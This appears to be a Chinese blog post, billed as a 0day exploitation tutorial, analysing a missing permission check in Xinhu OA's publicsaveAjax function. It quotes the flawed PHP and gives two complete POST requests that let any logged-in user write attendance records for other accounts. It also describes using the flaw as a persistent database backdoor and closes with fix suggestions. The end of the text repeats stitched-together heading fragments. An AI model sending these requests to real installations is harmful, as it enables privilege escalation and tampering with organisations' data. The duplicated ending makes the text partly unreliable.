信呼OA数据库后门0day漏洞分析与利用教学<\/h1>

漏洞概述<\/h2>
本文详细分析了信呼OA系统中存在的一个数据库后门0day漏洞，该漏洞允许攻击者在后台进行垂直和水平越权操作，直接向数据库插入任意数据。漏洞存在于`webmain\/webmainAction.php<\/code>文件的publicsaveAjax<\/code>函数中。<\/p>`

漏洞分析<\/h2>
漏洞位置<\/h3>
漏洞核心位于webmain\/webmainAction.php<\/code>文件中的publicsaveAjax<\/code>函数，该函数负责处理公共保存操作。<\/p>
关键代码分析<\/h3>
public<\/span> function<\/span> publicsaveAjax<\/span>()
<\/span><\/span>{
<\/span><\/span>    $this-><\/span>iszclogin<\/span>(); \/\/ 仅验证登录状态
<\/span><\/span><\/span><\/span>    $table =<\/span> $this-><\/span>rock<\/span>-><\/span>xssrepstr<\/span>($this-><\/span>rock<\/span>-><\/span>iconvsql<\/span>($this-><\/span>post<\/span>('tablename_postabc'<\/span>,''<\/span>,1<\/span>),1<\/span>));
<\/span><\/span>    $id =<\/span> (int<\/span>)$this-><\/span>post<\/span>('id'<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 缺少权限验证
<\/span><\/span><\/span><\/span>    $db =<\/span> m<\/span>($table);
<\/span><\/span>    $where =<\/span> "`id`='<\/span>$id<\/span>'"<\/span>;
<\/span><\/span>    if<\/span>($id==<\/span>0<\/span>)$where=<\/span>''<\/span>;
<\/span><\/span>    
<\/span><\/span>    \/\/ 接收并处理提交的字段
<\/span><\/span><\/span><\/span>    $submditfi =<\/span> $this-><\/span>rock<\/span>-><\/span>jm<\/span>-><\/span>base64decode<\/span>($this-><\/span>post<\/span>('submitfields_postabc'<\/span>));
<\/span><\/span>    $fields =<\/span> explode<\/span>(','<\/span>, $submditfi);
<\/span><\/span>    
<\/span><\/span>    foreach<\/span>($fields as<\/span> $field){
<\/span><\/span>        $field =<\/span> $this-><\/span>rock<\/span>-><\/span>xssrepstr<\/span>($field);
<\/span><\/span>        $val =<\/span> $this-><\/span>post<\/span>(''<\/span>.<\/span>$field.<\/span>''<\/span>);
<\/span><\/span>        $uaarr[$field]=<\/span>$val;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 执行数据库操作
<\/span><\/span><\/span><\/span>    $sbo =<\/span> $db-><\/span>record<\/span>($uaarr, $where);
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞成因<\/h3>

权限验证缺失<\/strong>：仅验证了登录状态(iszclogin()<\/code>)，没有检查用户权限<\/li>
未过滤表名和字段<\/strong>：虽然进行了XSS防护，但未限制可操作的表和字段<\/li>
直接数据库操作<\/strong>：接收用户输入后直接执行数据库插入\/更新操作<\/li>
<\/ol>
漏洞利用<\/h2>
利用条件<\/h3>

需要已登录后台（任意权限用户）<\/li>
知道目标表名和字段结构<\/li>
<\/ul>
路由构造<\/h3>
根据信呼OA的路由规则，构造如下请求参数：<\/p>

a=publicsave<\/code> (调用publicsaveAjax方法)<\/li>
m=index<\/code> (webmain下)<\/li>
d=<\/code> (空)<\/li>
ajaxbool=true<\/code> (AJAX请求)<\/li>
<\/ul>
利用步骤<\/h3>

垂直越权示例（管理员签到功能）<\/strong><\/li>
<\/ol>
POST<\/span> \/xinhu-master\/index.php?a=publicsave&m=index&d=&ajaxbool=true HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target.com<\/span>
<\/span><\/span>Cookie:<\/span> [有效的会话Cookie]<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>id=0&recename=攻击者&uid=12&dkdt=2025-08-07+10:09:00&explain=&otherfields=type=3,optdt={now}&tablename_postabc=kqdkjl&submitfields_postabc=ZGtkdCx1aWQsZXhwbGFpbg==&editrecord_postabc=false
<\/span><\/span><\/code><\/pre>
水平越权示例（操作用户数据）<\/strong><\/li>
<\/ol>
POST<\/span> \/xinhu-master\/index.php?a=publicsave&m=index&d=&ajaxbool=true HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target.com<\/span>
<\/span><\/span>Cookie:<\/span> [有效的会话Cookie]<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>id=0&recename=其他用户&uid=7&dkdt=2025-08-07+10:09:00&explain=&otherfields=type=3,optdt={now}&tablename_postabc=kqdkjl&submitfields_postabc=ZGtkdCx1aWQsZXhwbGFpbg==&editrecord_postabc=false
<\/span><\/span><\/code><\/pre>关键参数说明<\/h3>

tablename_postabc<\/code>: 目标表名（经过编码）<\/li>
submitfields_postabc<\/code>: Base64编码的字段列表（如dkdt,uid,explain<\/code>编码为ZGtkdCx1aWQsZXhwbGFpbg==<\/code>）<\/li>
otherfields<\/code>: 额外字段设置（支持变量如{now}<\/code>表示当前时间）<\/li>
id<\/code>: 记录ID，0表示新增<\/li>
<\/ul>
漏洞修复建议<\/h2>


在publicsaveAjax<\/code>函数中添加权限验证：<\/p>
if<\/span>(!<\/span>$this-><\/span>isadmin<\/span>()) return<\/span> returnerror<\/span>('无权限'<\/span>);
<\/span><\/span><\/code><\/pre><\/li>

限制可操作的表名白名单：<\/p>
$allowedTables =<\/span> ['table1'<\/span>, 'table2'<\/span>];
<\/span><\/span>if<\/span>(!<\/span>in_array<\/span>($table, $allowedTables)) return<\/span> returnerror<\/span>('禁止操作该表'<\/span>);
<\/span><\/span><\/code><\/pre><\/li>

对字段进行严格过滤，只允许特定字段：<\/p>
$allowedFields =<\/span> ['field1'<\/span>, 'field2'<\/span>];
<\/span><\/span>foreach<\/span>($fields as<\/span> $field){
<\/span><\/span>    if<\/span>(!<\/span>in_array<\/span>($field, $allowedFields)) continue<\/span>;
<\/span><\/span>    \/\/ 处理字段
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
总结<\/h2>
该漏洞展示了信呼OA系统中存在的权限控制缺陷，攻击者可以利用此漏洞：<\/p>

进行垂直越权，执行高权限操作<\/li>
进行水平越权，操作用户数据<\/li>
作为持久化后门，向数据库插入恶意数据<\/li>
<\/ol>
PHP应用开发中应特别注意权限控制，建议使用成熟的权限管理框架或实现统一的权限检查机制。<\/p>

信呼OA数据库后门0day漏洞分析与利用教学<\/h1>

漏洞位置<\/h3> 漏洞核心位于webmain\/webmainAction.php<\/code>文件中的publicsaveAjax<\/code>函数，该函数负责处理公共保存操作。<\/p>

漏洞利用<\/h2>

漏洞位置<\/h3>
漏洞核心位于`webmain\/webmainAction.php<\/code>文件中的publicsaveAjax<\/code>函数，该函数负责处理公共保存操作。<\/p>`